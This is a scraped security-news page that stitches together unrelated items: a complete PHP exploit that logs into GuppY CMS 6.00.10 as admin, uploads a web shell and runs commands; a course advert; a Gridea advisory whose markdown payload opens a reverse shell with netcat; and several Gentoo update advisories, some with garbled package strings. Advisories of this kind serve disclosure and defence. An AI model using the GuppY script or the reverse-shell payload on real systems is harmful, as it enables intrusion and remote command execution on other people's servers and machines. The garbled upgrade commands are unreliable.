GuppY CMS version 6.00.10 suffers from an authenticated remote shell upload vulnerability.

    # Exploit Title: GuppY 6.00.10 CMS Remote Code Execution# Date: Sep 30, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.freeguppy.org/# Software Link:https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2# Version: 6.00.10# Tested on: Linux#!/usr/bin/php<?php$username = "Admin"; //Administrator username$password = "rose1337"; //Administrator password$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\n");$target     =  $options['u'];$command    =  $options['c'];// Administrator login$cookie="cookie.txt";$url = "{$target}guppy/connect.php";$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;$curlObj = curl_init();curl_setopt($curlObj, CURLOPT_URL, $url);curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curlObj, CURLOPT_HEADER, 1);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);curl_setopt ($curlObj, CURLOPT_POST, 1);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$result = curl_exec($curlObj);// uploading shell$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";$post='------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="rep"file------WebKitFormBoundarygA1APFcUlkIaWal4Content-Disposition: form-data; name="ficup"; filename="shell.php"Content-Type: application/x-php<?php system($_GET["cmd"]); ?>------WebKitFormBoundarygA1APFcUlkIaWal4--';$headers = array(            'Content-Type: multipart/form-data;boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',            'Accept-Encoding: gzip, deflate',            'Accept-Language: en-US,en;q=0.9');curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);curl_setopt($curlObj, CURLOPT_URL, $url2);curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);curl_setopt($curlObj, CURLOPT_POST, true);curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");$data = curl_exec($curlObj);// Executing the shell$shell = "{$target}guppy/file/shell.php?cmd=" .$command;curl_setopt($curlObj, CURLOPT_URL, $shell);curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:application/x-www-form-urlencoded'));curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);curl_setopt($curlObj, CURLOPT_HEADER, False);curl_setopt($curlObj, CURLOPT_POST, false);$exec_shell = curl_exec($curlObj);$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);if($code != 200) {    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check thecredentials\n";}else {print("\n");print($exec_shell);}curl_close($curlObj);?>

GuppY CMS 6.00.10 Shell Upload

Whether you relish a mental challenge or fancy a six-figure paycheck, there are many good reasons to get into white hat hacking. That said, picking up the necessary knowledge to build a new career can seem like a daunting task. There is a lot to learn, after all.
To help you get started, The Hacker News Deals is currently running an eye-catching offer: pay what you want for one video course, and

Whether you relish a mental challenge or fancy a six-figure paycheck, there are many good reasons to get into white hat hacking. That said, picking up the necessary knowledge to build a new career can seem like a daunting task. There is a lot to learn, after all.

To help you get started, The Hacker News Deals is currently running an eye-catching offer: pay what you want for one video course, and get another eight courses if you beat the average price paid.

**_Special Offer_** _— For a limited time, name your price for one cybersecurity course and beat the average price paid to_ _get lifetime access to nine courses__. The full bundle is worth $1,668!_

With thousands of unfilled positions, white hat hacking is a lucrative and exciting career path. This bundle provides a solid introduction to the world of penetration testing and general cybersecurity, with over 65 hours of intensive training.

Through concise video tutorials, you learn how to secure your own machine with Kali Linux and pinpoint vulnerabilities in a range of systems: websites, apps, networks, databases, and more.

Along the way, you pick up knowledge of various real-world attacks — from authentication and session management to access controls and data stores.

The training also covers techniques such as social engineering, keylogging, using virtual machines, and passive information gathering. You even discover how to craft software that is completely undetectable.

All the content comes from top-rated sources, like LearnPentest. This collective of ethical hackers has over seven years of professional experience in the industry, and they hold top certifications like OSCP, LPT, C|EH, CISSP, and OSCE.

To start your hacking education, pay whatever you want for _Rootkits & Stealth Apps: Creating & Revealing 2.0_. If you beat the average price listed on the deal page, you will get access to the full bundle, worth $1,668.

_Prices subject to change._

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Pay What You Want for This Collection of White Hat Hacking Courses

Joplin version 2.8.8 allows an external attacker to execute arbitrary commands remotely on any client that opens a link in a malicious markdown file, via Joplin. This is possible because the application does not properly validate the schema/protocol of existing links in the markdown file before passing them to the 'shell.openExternal' function.

CVE-2022-40277: GitHub - laurent22/joplin: Joplin - an open source note taking and to-do application with synchronisation capabilities for Windows, macOS, Linux, Android and iOS.

Gridea version 0.9.3 allows an external attacker to execute arbitrary code remotely on any client attempting to view a malicious markdown file through Gridea. This is possible because the application has the 'nodeIntegration' option enabled.

1.  Home
2.  Advisories
3.  Gridea 0.9.3 RCE via nodeIntegration feature

**Summary**

**Name**

Gridea 0.9.3 - RCE via nodeIntegration feature

**Code name**

Marshmello

**Product**

Gridea

**Affected versions**

Version 0.9.3

**State**

Public

**Release date**

2022-09-26

**Vulnerability**

**Kind**

Remote command execution

**Rule**

004\. Remote command execution

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**CVSSv3 Base Score**

8.6

**Exploit available**

Yes

**CVE ID(s)**

CVE-2022-40274

**Description**

Gridea version 0.9.3 allows an external attacker to execute arbitrary code remotely on any client attempting to view a malicious markdown file through Gridea. This is possible because the application has the "nodeIntegration" option enabled.

**Vulnerability**

This vulnerability occurs because the application has the "nodeIntegration" option enabled. Due to the above, an attacker can embed malicious JS code in a markdown file and send it to the victim for viewing to achieve an RCE.

**Exploitation**

To exploit this vulnerability, you must send the following file to a user to open with Gridea. The exploit is triggered when the user presses "CTRL+P" or simply clicks "preview".

**exploit.md**

    <img src=1 onerror="require('child_process').exec('nc 192.168.20.38 4444 -e /bin/bash');"/>
    

**Evidence of exploitation**

**Our security police**

We have reserved the CVE-2022-40274 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: Gridea 0.9.3
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://github.com/getgridea/gridea

**Timeline**

2022-09-08

Vulnerability discovered.

2022-09-08

Vendor contacted.

2022-09-26

Public Disclosure.

CVE-2022-40274: Gridea 0.9.3  -  RCE via nodeIntegration feature | Fluid Attacks

Gentoo Linux Security Advisory 202209-27 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions less than 102.3.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #872059  
       ID: 202209-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could result in arbitrary code execution.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/firefox         < 102.3.0:esr          >= 102.3.0:esr  
                                < 105.0:rapid          >= 105.0:rapid  
  2  www-client/firefox-bin     < 102.3.0:esr          >= 102.3.0:esr  
                                < 105.0:rapid          >= 105.0:rapid

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-102.3.0"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-102.3.0"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-105.0"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-105.0"

References  
=========  
[ 1 ] CVE-2022-40956  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40956  
[ 2 ] CVE-2022-40957  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40957  
[ 3 ] CVE-2022-40958  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40958  
[ 4 ] CVE-2022-40959  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40959  
[ 5 ] CVE-2022-40960  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40960  
[ 6 ] CVE-2022-40962  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40962

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-27

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-27

Gentoo Linux Security Advisory 202209-20 - Multiple vulnerabilities have been discovered in PHP, the worst of which could result in local root privilege escalation. Versions less than 7.4.30:7.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-20  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: PHP: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #799776, #810526, #819510, #833585, #850772, #857054  
       ID: 202209-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in PHP, the worst of which  
could result in local root privilege escalation.

Background  
=========  
PHP is a widely-used general-purpose scripting language that is  
especially suited for Web development and can be embedded into HTML.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-lang/php               < 7.4.30:7.4             >= 7.4.30:7.4  
                                < 8.0.23:8.0             >= 8.0.23:8.0  
                                < 8.1.8:8.1               >= 8.1.8:8.1

Description  
==========  
Multiple vulnerabilities have been discovered in PHP. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All PHP 7.4 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/php-7.4.30:7.4"

All PHP 8.0 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/php-8.0.23:8.0"

All PHP 8.1 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/php-8.1.8:8.1"

References  
=========  
[ 1 ] CVE-2021-21703  
      https://nvd.nist.gov/vuln/detail/CVE-2021-21703  
[ 2 ] CVE-2021-21704  
      https://nvd.nist.gov/vuln/detail/CVE-2021-21704  
[ 3 ] CVE-2021-21705  
      https://nvd.nist.gov/vuln/detail/CVE-2021-21705  
[ 4 ] CVE-2021-21708  
      https://nvd.nist.gov/vuln/detail/CVE-2021-21708  
[ 5 ] CVE-2022-31625  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31625  
[ 6 ] CVE-2022-31626  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31626  
[ 7 ] CVE-2022-31627  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31627

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-20

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-20

Gentoo Linux Security Advisory 202209-24 - Multiple vulnerabilities have been discovered in Expat, the worst of which could result in arbitrary code execution. Versions less than 2.4.9 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-24  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Expat: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #791703, #830422, #831918, #833431, #870097  
       ID: 202209-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Expat, the worst of  
which could result in arbitrary code execution.

Background  
=========  
Expat is a set of XML parsing libraries.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-libs/expat             < 2.4.9                      >= 2.4.9

Description  
==========  
Multiple vulnerabilities have been discovered in Expat. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Expat users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/expat-2.4.9"

References  
=========  
[ 1 ] CVE-2021-45960  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45960  
[ 2 ] CVE-2021-46143  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46143  
[ 3 ] CVE-2022-22822  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22822  
[ 4 ] CVE-2022-22823  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22823  
[ 5 ] CVE-2022-22824  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22824  
[ 6 ] CVE-2022-22825  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22825  
[ 7 ] CVE-2022-22826  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22826  
[ 8 ] CVE-2022-22827  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22827  
[ 9 ] CVE-2022-23852  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23852  
[ 10 ] CVE-2022-23990  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23990  
[ 11 ] CVE-2022-25235  
      https://nvd.nist.gov/vuln/detail/CVE-2022-25235  
[ 12 ] CVE-2022-25236  
      https://nvd.nist.gov/vuln/detail/CVE-2022-25236  
[ 13 ] CVE-2022-25313  
      https://nvd.nist.gov/vuln/detail/CVE-2022-25313  
[ 14 ] CVE-2022-25314  
      https://nvd.nist.gov/vuln/detail/CVE-2022-25314  
[ 15 ] CVE-2022-25315  
      https://nvd.nist.gov/vuln/detail/CVE-2022-25315  
[ 16 ] CVE-2022-40674  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40674

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-24

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-24

Gentoo Linux Security Advisory 202209-22 - A vulnerability has been found in Kitty which could allow for arbitrary code execution with user input. Versions less than 0.26.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-22  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Kitty: Arbitrary Code Execution  
     Date: September 29, 2022  
     Bugs: #868543  
       ID: 202209-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in Kitty which could allow for arbitrary  
code execution with user input.

Background  
=========  
Kitty is a fast, feature-rich, GPU-based terminal.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  x11-terms/kitty            < 0.26.2                    >= 0.26.2

Description  
==========  
Carter Sande discovered that maliciously constructed control sequences  
can cause Kitty to display a notification that, when clicked, can cause  
Kitty to execute arbitrary commands.

Impact  
=====  
Kitty can produce notifications that, when clicked, can execute  
arbitrary commands.

Workaround  
=========  
Avoid clicking unexpected notifications.

Resolution  
=========  
All Kitty users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-terms/kitty-0.26.2"

References  
=========  
[ 1 ] CVE-2022-41322  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41322

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-22

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-22

Gentoo Linux Security Advisory 202209-26 - Multiple vulnerabilities have been discovered in Go, the worst of which could result in denial of service. Versions less than 1.18.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-26  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Go: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #869002  
       ID: 202209-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Go, the worst of which  
could result in denial of service.

Background  
=========  
Go is an open source programming language that makes it easy to build  
simple, reliable, and efficient software.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-lang/go                < 1.18.6                    >= 1.18.6

Description  
==========  
Multiple vulnerabilities have been discovered in Go. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Go users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/go-1.18.6"

In addition, users using Portage 3.0.9 or later should ensure that  
packages with Go binaries have no vulnerable code statically linked into  
their binaries by rebuilding the @golang-rebuild set:

  # emerge --ask --oneshot --verbose @golang-rebuild

References  
=========  
[ 1 ] CVE-2022-27664  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27664  
[ 2 ] CVE-2022-32190  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32190

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-26

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-26

Gentoo Linux Security Advisory 202209-23 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions less than 105.0.5195.125 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-23  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #868156, #868354, #872407, #870142  
       ID: 202209-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in Chromium and its  
derivatives, the worst of which could result in remote code execution.

Background  
=========  
Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web.

Google Chrome is one fast, simple, and secure browser for all your  
devices.

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/chromium        < 105.0.5195.125    >= 105.0.5195.125  
  2  www-client/chromium-bin    < 105.0.5195.125    >= 105.0.5195.125  
  3  www-client/google-chrome   < 105.0.5195.125    >= 105.0.5195.125  
  4  www-client/microsoft-edge  < 105.0.1343.42      >= 105.0.1343.42

Description  
==========  
Multiple vulnerabilities have been discovered in Chromium, Google  
Chrome, Microsoft Edge. Please review the CVE identifiers referenced  
below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-105.0.5195.125"

All Chromium binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-bin-105.0.5195.125"

All Google Chrome users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-105.0.5195.125"

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-105.0.1343.42"

References  
=========  
[ 1 ] CVE-2022-3038  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3038  
[ 2 ] CVE-2022-3039  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3039  
[ 3 ] CVE-2022-3040  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3040  
[ 4 ] CVE-2022-3041  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3041  
[ 5 ] CVE-2022-3042  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3042  
[ 6 ] CVE-2022-3043  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3043  
[ 7 ] CVE-2022-3044  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3044  
[ 8 ] CVE-2022-3045  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3045  
[ 9 ] CVE-2022-3046  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3046  
[ 10 ] CVE-2022-3047  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3047  
[ 11 ] CVE-2022-3048  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3048  
[ 12 ] CVE-2022-3049  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3049  
[ 13 ] CVE-2022-3050  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3050  
[ 14 ] CVE-2022-3051  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3051  
[ 15 ] CVE-2022-3052  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3052  
[ 16 ] CVE-2022-3053  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3053  
[ 17 ] CVE-2022-3054  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3054  
[ 18 ] CVE-2022-3055  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3055  
[ 19 ] CVE-2022-3056  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3056  
[ 20 ] CVE-2022-3057  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3057  
[ 21 ] CVE-2022-3058  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3058  
[ 22 ] CVE-2022-3071  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3071  
[ 23 ] CVE-2022-3075  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3075  
[ 24 ] CVE-2022-3195  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3195  
[ 25 ] CVE-2022-3196  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3196  
[ 26 ] CVE-2022-3197  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3197  
[ 27 ] CVE-2022-3198  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3198  
[ 28 ] CVE-2022-3199  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3199  
[ 29 ] CVE-2022-3200  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3200  
[ 30 ] CVE-2022-3201  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3201  
[ 31 ] CVE-2022-38012  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38012

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-23

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#linux